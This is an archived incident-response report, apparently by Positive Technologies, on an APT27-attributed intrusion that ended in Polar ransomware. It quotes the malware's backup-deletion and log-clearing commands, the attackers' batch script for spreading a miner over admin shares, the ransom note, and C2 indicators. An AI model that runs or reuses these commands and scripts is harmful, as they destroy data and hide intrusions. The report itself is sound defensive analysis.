{ "id": "bf622ec3-63e9-4a0f-af06-a295259028f8", "created_at": "2026-04-06T01:31:41.118465Z", "updated_at": "2026-04-10T03:37:21.546416Z", "deleted_at": null, "sha1_hash": "291c9f75be5db44e71d84666512d431a4cc5013b", "title": "Investigation with a twist: an accidental APT attack and averted data destruction", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1518882, "plain_text": "Investigation with a twist: an accidental APT attack and averted\r\ndata destruction\r\nBy Positive Technologies\r\nPublished: 2024-08-19 · Archived: 2026-04-06 00:42:20 UTC\r\nIn late April 2020, a client invited the CSIRT incident response team at the Positive Technologies Expert Security\r\nCenter (PT ESC) to investigate a network compromise that resulted in encryption of files on servers and employee\r\nworkstations.\r\nWe initially assumed that this was yet another attack on corporate networks with a common variety of\r\nransomware. However, what we found was different: this intrusion was the work of a well-known Asian APT\r\ngroup implicated in cyberespionage against government targets. The initial successful compromise had taken\r\nplace two years prior.\r\nIn this article, we will share the results of our investigation of this targeted attack, which started with the\r\ncompromise of a foreign office. Ultimately, we succeeded in bringing the infrastructure back to a secure condition\r\nand reversing the damage that had been done.\r\nSequence of events\r\nMass encryption of files on the client's infrastructure and a ransom demand formed the starting point of the\r\ninvestigation. A large number of damaged files is itself a very visible attack indicator that enabled detecting the\r\nintrusion. Retrospective analysis showed that the client's infrastructure had been compromised not three or four\r\ndays before (or even a few hours before, as often happens in mass attacks), but in early 2018. What's more, the\r\ninitial infection was of a foreign office of the client. Then a subsequent breach of the head office back home.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 1 of 19\n\nWe believe that the initial entry point to the foreign office's network was a vulnerable server on the network\r\nperimeter. Exploitation in February 2018 enabled the attackers to gain initial access and then persistence, with the\r\nhelp of the ChinaChopper and TwoFace web shells.\r\nThe attackers used NBTScan for network reconnaissance and PsExec for lateral movement. They obtained\r\ncredentials for pivoting with Mimikatz. In some cases, we were able to detect memory dumps of the lsass process\r\nthat had been archived and uploaded. Because use of Mimikatz was likely blocked by endpoint security software,\r\nthe attackers were forced to run bruteforcing offline. Another method was to scan hosts for so-called Eternal*\r\nSMB vulnerabilities with SMBTouch and then, where possible, run the EternalBlue exploit and infect the\r\ncomputer. On the hosts of presumably greatest interest, the SysUpdate and HyperBro backdoors were installed for\r\nreliable persistence and access.\r\nOne unexpected result of the compromise was cryptocurrency mining at both the foreign office and headquarters.\r\nSuch activity remained unnoticed for one and a half years. During this time the attackers only maintained their\r\naccess abilities by periodically obtaining new accounts or building tunnel chains. Our belief is that by early 2020,\r\nthe attackers had lost their access (for reasons unknown to us). We can see use of web shells on the foreign office's\r\nservers on February 9, 2020. Subsequent actions were very similar to what had happened two years earlier. By\r\nusing the tools already described, the attackers obtained the credentials of a domain administration at\r\nheadquarters. This time, they deleted OS logs and stopped Shadow Copy services, complicating subsequent\r\nincident analysis.\r\nFor the finale, on April 29, 2020, the account of the compromised domain admin was used to push Polar\r\nransomware to computers and run it, encrypting user files and demanding a ransom. While our specialists were\r\nassisting the client in May 2020, the attackers made yet another attempt to regain control of infrastructure with the\r\nhelp of web shells that were still in place on the network of the headquarters and office, but this time to no\r\nsuccess.\r\nHere we have provided a timeline to better show the sequence of events.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 2 of 19\n\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 3 of 19\n\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 4 of 19\n\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 5 of 19\n\nCSIRT's objectives included recovering the client's data, which included key information belonging to different\r\ndepartments. We performed analysis of the encryption malware and were able to recover the lost files.\r\nPolar ransomware\r\nThe method used to run the ransomware is classic and, indeed, characteristic of certain Asian groups. Three files\r\nare sent to the victim's computer:\r\nGDFInstall.exe (MD5: 13435101240f78367123ef01a938c560) is a legitimate computer game component\r\nsigned by Ubisoft.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 6 of 19\n\nGameuxInstallHelper.dll (MD5: 1fd8402275d42e7389f0d28b9537db0f) is a .NET DLL library (compiled\r\non April 29, 2020) imported when GDFInstall.exe is run.\r\nThis component is not actually legitimate, however: attacker code is executed after the GameExplorerInstallW\r\nsymbol is exported. This frequently used technique of loading malicious code in the context of a legitimate\r\napplication is known as DLL hijacking.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 7 of 19\n\nThe file c:\\programdata\\Sysurl.Hex is read (after being copied from c:\\windows\\system32\\Sysurl.Hex, if absent)\r\nand then simple XOR decrypted with key ABCSCDFRWFFSDJJHGYUOIj. The result is decoded with Base64,\r\nyielding a PE file that is loaded and run in memory with .NET. The payload and intermediate library are deleted\r\nbefore completion. Deletion occurs in the standard (insecure) way, which enables recovering the data if disk\r\naccess is stopped in time and the information has not been overwritten.\r\nSysurl.Hex is an encrypted copy of the Polar ransomware.\r\nThis payload call sequence (in which a legitimate application loads a malicious library, which in turn decrypts a\r\nthird component and passes control to it) is very commonly used to run the PlugX backdoor, which is widely seen\r\namong such Asian APT groups as APT10, APT41, TA459, and Bronze Union.\r\nLet's consider the decrypted and decoded version of the ransomware (MD5:\r\n841980b4ae02a4e6520ab834deee241b) in greater detail.\r\nBased on how GameuxInstallHelper.dll is launched, we quickly can guess that this file, too, is an executable file\r\ncompiled with .NET. The compilation date is April 9, 2020. The code entry point is the Actions method of the\r\nEncode class in the Polar name space (which is the name we have used for the malware family).\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 8 of 19\n\nThe malware deletes system event logs and shadow copies by performing the following commands:\r\ndism /online /enable-feature /featurename:NetFx3\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nbcdedit /set {default} recoveryenabled no\r\nwmic shadowcopy delete\r\nwbadmin delete backup\r\nwbadmin delete systemstatebackup -keepversions:0\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nbcdedit /set {default} recoveryenabled no\r\nwevtutil.exe clear-log Application\r\nwevtutil.exe clear-log Security\r\nwevtutil.exe clear-log System\r\nwbadmin delete catalog -quiet\r\nwbadmin delete catalog -quiet\r\nwbadmin delete systemstatebackup\r\nIt then looks for and stops the following processes:\r\nagntsvc.exe\r\nagntsvc.exe\r\nagntsvc.exe\r\nagntsvc.exe\r\ndbeng50.exe\r\ndbsnmp.exe\r\nencsvc.exe\r\nexcel.exe\r\nfirefoxconfig.exe\r\ninfopath.exe\r\nisqlplussvc.exe\r\nmsaccess.exe\r\nmsftesql.exe\r\nmspub.exe\r\nmydesktopqos.exe\r\nmydesktopservice.exe\r\nmysqld-nt.exe\r\nmysqld-opt.exe\r\nmysqld.exe\r\nnotepad++.exe\r\nnotepad.exe\r\nocautoupds.exe\r\nocomm.exe\r\nocssd.exe\r\nonenote.exe\r\noracle.exe\r\noutlook.exe\r\npowerpnt.exe\r\nsqbcoreservice.exe\r\nsqlagent.exe\r\nsqlbrowser.exe\r\nsqlservr.exe\r\nsqlwriter.exe\r\nsteam.exe\r\nsynctime.exe\r\ntbirdconfig.exe\r\nthebat.exe\r\nthebat64.exe\r\nthunderbird.exe\r\nvisio.exe\r\nwinword.exe\r\nwordpad.exe\r\nxfssvccon.exe\r\nThen the malware gets a list of connected disks and starts recursive traversal of directories, skipping a few of\r\nthem:\r\nC:\\Windows\r\nC:\\Program Files\r\nC:\\Program Files (x86)\r\nC:\\ProgramData\r\nC:\\Python\r\n$SysReset\r\n$Recycle.Bin\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 9 of 19\n\n$RECYCLE.BIN\r\nIt cares only about files with the following extensions:\r\n.3dm\r\n.3ds\r\n.3g2\r\n.3gp\r\n.7z\r\n.accdb\r\n.ai\r\n.aif\r\n.asf\r\n.asp\r\n.aspx\r\n.avi\r\n.bak\r\n.bin\r\n.bmp\r\n.c\r\n.cbr\r\n.cer\r\n.cfm\r\n.class\r\n.cpp\r\n.crdownload\r\n.cs\r\n.csr\r\n.css\r\n.csv\r\n.cue\r\n.dat\r\n.db\r\n.dbf\r\n.dds\r\n.deb\r\n.dmg\r\n.dmp\r\n.doc\r\n.docx\r\n.dtd\r\n.dwg\r\n.dxf\r\n.eps\r\n.fla\r\n.flv\r\n.ged\r\n.gif\r\n.gz\r\n.h\r\n.html\r\n.ics\r\n.iff\r\n.indd\r\n.ini\r\n.iso\r\n.java\r\n.jpg\r\n.js\r\n.jsp\r\n.key\r\n.keychain\r\n.log\r\n.lua\r\n.m\r\n.m3u\r\n.m4a\r\n.m4v\r\n.max\r\n.mdb\r\n.mdf\r\n.mid\r\n.mov\r\n.mp3\r\n.mp4\r\n.mpa\r\n.mpg\r\n.msg\r\n.msi\r\n.obj\r\n.odt\r\n.pages\r\n.part\r\n.pct\r\n.pdb\r\n.pdf\r\n.php\r\n.pkg\r\n.pl\r\n.png\r\n.pps\r\n.ppt\r\n.pptx\r\n.ps\r\n.psd\r\n.py\r\n.rar\r\n.rm\r\n.rpm\r\n.rss\r\n.rtf\r\n.sdf\r\n.sh\r\n.sitx\r\n.sln\r\n.sql\r\n.srt\r\n.svg\r\n.swf\r\n.swift\r\n.tar\r\n.tar.gz\r\n.tax2014\r\n.tax2015\r\n.tex\r\n.tga\r\n.thm\r\n.tif\r\n.tiff\r\n.tmp\r\n.toast\r\n.torrent\r\n.txt\r\n.vb\r\n.vcd\r\n.vcf\r\n.vcxproj\r\n.vob\r\n.wav\r\n.wma\r\n.wmv\r\n.wpd\r\n.wps\r\n.xcodeproj\r\n.xhtml\r\n.xlr\r\n.xls\r\n.xlsx\r\n.xml\r\n.yuv\r\n.zip\r\n.zipx\r\nBefore starting encryption, the malware creates what we will call a base encryption key consisting of eight\r\nrandomly chosen characters from the following alphabet:\r\nabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=\u0026?\u0026/\r\nTwo approaches to encryption are used, depending on the file size. Each approach involves a different encryption\r\nkey. The base encryption key is used in both approaches, however.\r\nFirst we will look at the approach for encryption of files with size less than 64,052,000 bytes (approximately 61\r\nMB). The intermediate password is the SHA-256 hash sum of the base encryption key. It is identical for all files\r\nand is used with a hard-coded salt and 1,000 iterations to generate the encryption key and initialization vector.\r\nEach key is encrypted with AES-CBC. The .locked extension is added to encrypted files.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 10 of 19\n\nLarger files are encrypted in a different way. In this case, the 16-byte encryption key is formed by taking the first 8\r\nbytes from the base encryption key and the remaining 8 bytes from an additional hard-coded array. This is\r\nfollowed by a custom implementation of AES-ECB. Blocks of 16 bytes are encrypted, with the next 12,800 bytes\r\nskipped. The result is that only small parts of the file—not the entire file—are encrypted. This method was likely\r\nto chosen to speed up the encryption process. Encrypted files have the .cryptd extension.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 11 of 19\n\nNote that the result is creation of a new file (where the encrypted stream is written). The original file is insecurely\r\ndeleted. Therefore, the original files can also be recovered from unallocated disk space if they have not yet been\r\noverwritten with fresh information.\r\nIn each directory containing encrypted files, a file named readme_contact_alex.dali@iran.ir.htm is created with\r\nthe following contents:\r\nYour companies cyber defense systems have been weighed, measured and have been found wanting!!!\r\nThe breach is a result of grave neglect of security protocols\r\nAll of your computers have been corrupted with Polar malware that has encrypted your files.\r\nWe ensure that the only way to retrieve your data swiftly and securely is with our software.\r\nRestoration of your data requires a private key which only we possess\r\nDon't waste your time and money purchasing third party software, without the private key they are use\r\nIt is critical that you don't restart or shutdown your computer.\r\nThis may lead to irreversible damage to your data and you may not be able to turn your computer back\r\nTo confirm that our software works email to us 2 files from random computers you will get them decryp\r\nreadme_contact_alex.dali@iran.ir.htm contain encrypted session keys we need in order to be able to de\r\nThe softwares price will include a guarantee that your company will never be inconvenienced by us.\r\nYou will also receive a consultation on how to improve your companies cyber security\r\nIf you want to purchase our software to restore your data contact us at:\r\nPt34Jarmys@protonmail.com\r\nalex.dali@iran.ir\r\nWe can only show you the door. You're the one who has to walk through it.\r\nYour personal installation key:*REDACTED*\r\nThe text of the ransom demand resembles that used by MegaCortex ransomware.\r\nThe ransom demand contains a modified version of the base encryption key. This version is derived by encrypting\r\nthe base encryption key with RSA (with a hard-coded 1024-byte public key) and encoding it in Base64.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 12 of 19\n\nAfter file encryption is completed, the malware writes an image (contained in executable file resources) to disk at\r\nthe path c:\\programdata\\Rs.bmp and sets it as the desktop background.\r\nThe malware subsequently repeats the same procedure for deleting system event logs and shadow copies that it\r\nperformed at the start. Then it sends an HTTP POST request with the name of the victim's computer to a server at\r\nhxxp://www.therockbrazil.com.br/assinaturas/logs.php.\r\nHow we decrypted the files\r\nReaders following the chain of encryption steps have likely noticed that the security of this whole encryption\r\nsystem depends on what we have called the base encryption key. Its value is encrypted with RSA-1024 and placed\r\nin the ransom demand. Currently, there are no methods that are both cheap and fast for factoring a key of such\r\nsize. So we tried another tactic.\r\nRemember that the base key is generated by taking eight random characters from the alphabet quoted earlier. Here\r\nis how the implementation works:\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 13 of 19\n\nThe Random function is called once, without any arguments. This call returns a random number, the seed for\r\npseudorandom generation of which is taken from the value of the Environment.TickCount variable. This variable\r\nis 4 bytes and stores the number of milliseconds since the operating system started.\r\nSo to decode the files, all we need to know is the uptime (how long the computer has been turned on) as of when\r\nthe ransomware ran. But how simple is it to calculate?\r\nMost of the affected computers had not only been disconnected from the corporate network, but turned off for\r\nanalysis of the hard drive contents. Due to this, the uptime of the computers could not be known. The operating\r\nsystem logs contain timestamps for shutdown and power on. But in this case, the ransomware destroys these logs\r\ntwice. So we were unable to find any clues pointing at possible values of uptime on the affected computers\r\nthemselves.\r\nFortunately, however, SCCM was used on the client infrastructure, with client-side agents running on all the\r\nencrypted computers. The information we needed was stored centrally and had not been tampered with: all we\r\nneeded was some trial-and-error to choose the right values.\r\nNow that we had relatively precise uptime values, we needed to determine when the ransomware had run.\r\nRemember that at the end, the malware deletes the intermediate DLL library and encrypted ransomware, but not\r\nthe legitimate executable file whose process is used for performing the malicious actions. In other words, the time\r\nat which this file appeared on the system should be the approximate time when the ransomware ran, to within\r\nseveral seconds. We succeeded in bruteforcing the exact value of the base encryption key in about a minute on an\r\nordinary workstation (on the order of a few tens of thousands of iterations). We could then decrypt the remaining\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 14 of 19\n\nfiles. In a few cases, we had a tougher time bruteforcing the key at first. The reason was that the timezones had\r\nbeen set incorrectly. With this realization, we were able to conquer this issue as well.\r\nAttribution\r\nWe mentioned the SysUpdate and HyperBro backdoors from the attackers' toolkit. These are somewhat esoteric\r\nRemote Access Trojans used by the APT27 group (also known as Bronze Union, LuckyMouse, Emissary Panda,\r\nor Iron Tiger). The group likely has Asian roots, with activity since at least 2010. The group focuses its attention\r\non government targets in the defense and energy industries, as well as aerospace and manufacturing. Most\r\ncommonly, the original attack vector is a compromise of the victim's web servers by exploiting vulnerabilities,\r\nbruteforcing credentials, or taking advantage of web server misconfigurations. Despite the similarities in tactics,\r\ntechniques, and procedures (TTPs) and use of a telltale toolkit, some of the team's researchers are skeptical about\r\nattribution of the attacks to APT27.\r\n1. Choice of target\r\nMedia companies had never been of interest for APT27. This is consistent with the findings of our incident\r\ninvestigation: the attackers did not try to access private information on the target infrastructure, instead only\r\nrunning software for direct financial gain.\r\n2. Cryptocurrency mining and ransomware\r\nThis is atypical and, moreover, ill-suited software that can quickly attract attention and wreck any plans for long-term cyberspying. The URL address to which the ransomware \"phones home\" upon completing its work does not\r\nhave anything in common with APT27 network infrastructure. Of course, some groups (such as Lazarus and\r\nWinnti) combine cyberspying with direct financial motivations, so perhaps APT27 is broadening its previously\r\nlimited range of interests. Or, as an alternative, the group has reached an agreement with other attackers for use of\r\ntheir software in return for a part of the proceeds. In favor of attribution of Polar to APT27, we can note the\r\nsequence of payload, execution, and naming: the encrypted SysUpdate backdoor is often named sys.bin.url and\r\nthe Polar ransomware was named Sysurl.Hex, in a rather similar way. However, this could also be a false flag.\r\n3. Automation in 2018 and 2020\r\nHere is the script used to automatically install a cryptocurrency miner on a list of computers in 2018:\r\n@echo off\r\nfor /f %%i in (c:\\programdata\\list.txt) do (\r\nnet use \\\\%%i\\c$ \"*\" /u:*\\administrator\r\ncopy c:\\programdata\\vmnat.exe \\\\%%i\\c$\\windows\\system32\\vmnat.exe\r\nSCHTASKS /Create /S %%i /u *\\administrator /p \"*\" /tn * /tr \"cmd.exe /c start c:\\windows\\system32\\vmn\r\nschtasks /run /S %%i /u *\\administrator /p \"*\" /tn *\r\nnet use \\\\%%i\\c$ /del\r\nnet use * /del /Y\r\n)\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 15 of 19\n\ndel vmnat.exe\r\ndel list.txt\r\ndel work.bat\r\nAnd this is the script used to automatically delete the ransomware from a list of computers in 2020:\r\n@echo off\r\nfor /f %%i in (c:\\programdata\\list.txt) do (\r\n net use \\\\%%i\\c$ \"*\" /u:*\\*\r\n if not errorlevel 1 (\r\n del \\\\%%i\\c$\\programdata\\GameuxInstallHelper.dll\r\n del \\\\%%i\\c$\\programdata\\GDFInstall.exe\r\n del \\\\%%i\\c$\\programdata\\Sysurl.Hex\r\n net use \\\\%%i\\c$ /del\r\n )ELSE (\r\n echo not access %%i \u003e\u003e c:\\programdata\\no_access.txt\r\n )\r\n)\r\n(We replaced sensitive information with '*')\r\nThe scripts show certain similarities in structure and have the same loop of file lines at the same path. On the other\r\nhand, the indentation, script tasks, and file naming are different. Some of the commands are too general to tell,\r\nsince they could have been found in online search results and reused.\r\n4. Bodies of the SysUpdate and HyperBro backdoors\r\nWe were not able in some cases to confirm the presence of a given backdoor based on the body of the Trojan\r\nitself. We identified the HyperBro backdoor, which had been used in 2018, based on the distinctive file name\r\ncombined with other confirmed tools. We confirmed the SysUpdate backdoor, used in 2020, by looking at the C2\r\naddress and backdoor body in the process dump memory that had been uploaded to VirusTotal during\r\ninvestigation from an organization not linked to our client.\r\nTaken together, these similarities certainly point to APT27 as a culprit, but are not entirely conclusive. Therefore\r\nwe leave it to the reader to choose whether to concur regarding involvement by APT27.\r\nConclusion\r\nIn this article, we have described an APT27 attack on a media company. The cybercriminals obtained access to the\r\ncompany's headquarters by compromising an office in a foreign country. They maintained control of the\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 16 of 19\n\ninfrastructure for two years. They used both publicly available and custom-developed tools that had been seen\r\npreviously. The hackers, while not changing their TTPs, chose rather unusual software to monetize their attacks.\r\nPerhaps the compromise of this client was an accident and this was merely an attempt to obtain at least some\r\nbenefit. User data was encrypted, after which a ransom demand was made. A mistake in the ransomware's\r\ncryptographic algorithms enabled us to recover the encrypted files. To our knowledge, the attackers did not obtain\r\naccess to information of any value whatsoever, ultimately leaving them with nothing to show for their efforts.\r\nAuthors: Denis Goydenko and Alexey Vishnyakov, Positive Technologies\r\nMITRE TTPs\r\nTactic ID Name\r\nInitial Access\r\nT1190 Exploit Public-Facing Application\r\nT1199 Trusted Relationship\r\nExecution\r\nT1059 Command and Scripting Interpreter: Windows Command Shell\r\nT1053 Scheduled Task/Job: Scheduled Task\r\nT1047 Windows Management Instrumentation\r\nPersistence\r\nT1547 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nT1574 Hijack Execution Flow: DLL Search Order Hijacking\r\nT1053 Scheduled Task/Job: Scheduled Task\r\nT1078 Valid Accounts: Domain Accounts\r\nT1078 Valid Accounts: Default Accounts\r\nPrivilege Escalation T1068 Exploitation for Privilege Escalation\r\nDefense Evasion\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1070 Indicator Removal on Host: Clear Windows Event Logs\r\nT1070 Indicator Removal on Host: File Deletion\r\nT1070 Indicator Removal on Host: Timestomp\r\nCredential Access T1003 OS Credential Dumping: LSASS Memory\r\nDiscovery\r\nT1087 Account Discovery: Domain Account\r\nT1082 System Information Discovery\r\nT1049 System Network Connections Discovery\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 17 of 19\n\nTactic ID Name\r\nLateral Movement\r\nT1210 Exploitation of Remote Services\r\nT1570 Lateral Tool Transfer\r\nT1021 Remote Services: SMB/Windows Admin Shares\r\nCollection\r\nT1560 Archive Collected Data: Archive via Utility\r\nT1005 Data from Local System\r\nT1119 Automated Collection\r\nT1039 Data from Network Shared Drive\r\nCommand and Control\r\nT1071 Application Layer Protocol: Web Protocols\r\nT1132 Data Encoding: Standard Encoding\r\nT1573 Encrypted Channel: Symmetric Cryptography\r\nExfiltration\r\nT1020 Automated Exfiltration\r\nT1041 Exfiltration Over C2 Channel\r\nImpact T1486 Data Encrypted for Impact\r\nIOCs\r\nChinaChopper:\r\n2ce60073c09887f9e3a482097294e17d\r\n5bc0d6918e03a92f04b3dfc21b619c7f\r\n73717a2f9bfe19ccdad541bec1fa2b69\r\n82a8470534d74c9c5c0d84071eb0a703\r\nb89e96e2ea8dd6fdb438f7d5b8ecf60c\r\nTwoFace:\r\n581c331d41ef5f5df99ae0d16b2cebf0\r\nff2693903a1049984745e79381e9ed7e\r\nSysUpdate:\r\n3c1981991cce3b329902288bb2354728\r\n43a2c2fb8d52dc1835ac18516b13aff1\r\n4b5484e3de5c5a2e60fcee50d04183d6\r\nSysUpdate C\u0026C:\r\n103.59.144[.]183\r\n95.179.189[.]33\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 18 of 19\n\nNBTScan:\r\nf01a9a2d1e31332ed36c1a4d2839f412\r\nSMBTouch:\r\nb50fff074764b3a29a00b245e4d0c863\r\nPsExec:\r\naeee996fd3484f28e5cd85fe26b6bdcd\r\nTermite:\r\ndc92496358b8e67568a35b861ba1804e39e3d36b\r\nDsquery:\r\n3583d7c971de148a1ffb3302d1510ef1\r\nEternalBlue:\r\n8c80dd97c37525927c1e549cb59bcbf3\r\nfrsocks:\r\nda0c13d834cafc010bec1afa2d76196ced71e661\r\nMimikatz:\r\n449da3d7405c2c79fa55bd7973096e28\r\n0078ff05c20689f40ea9cb8c47fcfb2e52cdc3a9\r\nBitMiner:\r\n5430039162e58c44f9a5941295b55fba\r\nPolar:\r\n841980b4ae02a4e6520ab834deee241b\r\nSource: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/" ], "report_names": [ "incident-response-polar-ransomware-apt27" ], "threat_actors": [ { "id": "ec14074c-8517-40e1-b4d7-3897f1254487", "created_at": "2023-01-06T13:46:38.300905Z", "updated_at": "2026-04-10T02:00:02.918468Z", "deleted_at": null, "main_name": "APT10", "aliases": [ "Red Apollo", "HOGFISH", "BRONZE RIVERSIDE", "G0045", "TA429", "Purple Typhoon", "STONE PANDA", "Menupass Team", "happyyongzi", "CVNX", "Cloud Hopper", "ATK41", "Granite Taurus", "POTASSIUM" ], "source_name": "MISPGALAXY:APT10", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7041fcf5-b34d-47c3-be4c-3c40f243af89", "created_at": "2023-01-06T13:46:38.611261Z", "updated_at": "2026-04-10T02:00:03.038745Z", "deleted_at": null, "main_name": "TA459", "aliases": [ "G0062" ], "source_name": "MISPGALAXY:TA459", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0bf35542-9ebc-44a9-b319-b6df0bee4bac", "created_at": "2022-10-25T15:50:23.437853Z", "updated_at": "2026-04-10T02:00:05.36762Z", "deleted_at": null, "main_name": "TA459", "aliases": [ "TA459" ], "source_name": "MITRE:TA459", "tools": [ "gh0st RAT", "NetTraveler", "PlugX", "ZeroT" ], "source_id": "MITRE", "reports": null }, { "id": "802552ac-1f16-4b85-8d78-76d683684124", "created_at": "2022-10-25T16:07:24.28032Z", "updated_at": "2026-04-10T02:00:04.920517Z", "deleted_at": null, "main_name": "TA459", "aliases": [ "G0062" ], "source_name": "ETDA:TA459", "tools": [ "Agent.dhwf", "AngryRebel", "Destroy RAT", "DestroyRAT", "Farfli", "Gh0st RAT", "Ghost RAT", "Kaba", "Korplug", "Moudour", "Mydoor", "NetTraveler", "Netfile", "PCRat", "PlugX", "RedDelta", "Sogu", "TIGERPLUG", "TVT", "Thoper", "TravNet", "Xamtrav", "ZeroT" ], "source_id": "ETDA", "reports": null }, { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "ba9fa308-a29a-4928-9c06-73aafec7624c", "created_at": "2024-05-01T02:03:07.981061Z", "updated_at": "2026-04-10T02:00:03.750803Z", "deleted_at": null, "main_name": "BRONZE RIVERSIDE", "aliases": [ "APT10 ", "CTG-5938 ", "CVNX ", "Hogfish ", "MenuPass ", "MirrorFace ", "POTASSIUM ", "Purple Typhoon ", "Red Apollo ", "Stone Panda " ], "source_name": "Secureworks:BRONZE RIVERSIDE", "tools": [ "ANEL", "AsyncRAT", "ChChes", "Cobalt Strike", "HiddenFace", "LODEINFO", "PlugX", "PoisonIvy", "QuasarRAT", "QuasarRAT Loader", "RedLeaves" ], "source_id": "Secureworks", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "c63ab035-f9f2-4723-959b-97a7b98b5942", "created_at": "2023-01-06T13:46:38.298354Z", "updated_at": "2026-04-10T02:00:02.917311Z", "deleted_at": null, "main_name": "APT27", "aliases": [ "BRONZE UNION", "Circle Typhoon", "Linen Typhoon", "TEMP.Hippo", "Budworm", "Lucky Mouse", "G0027", "GreedyTaotie", 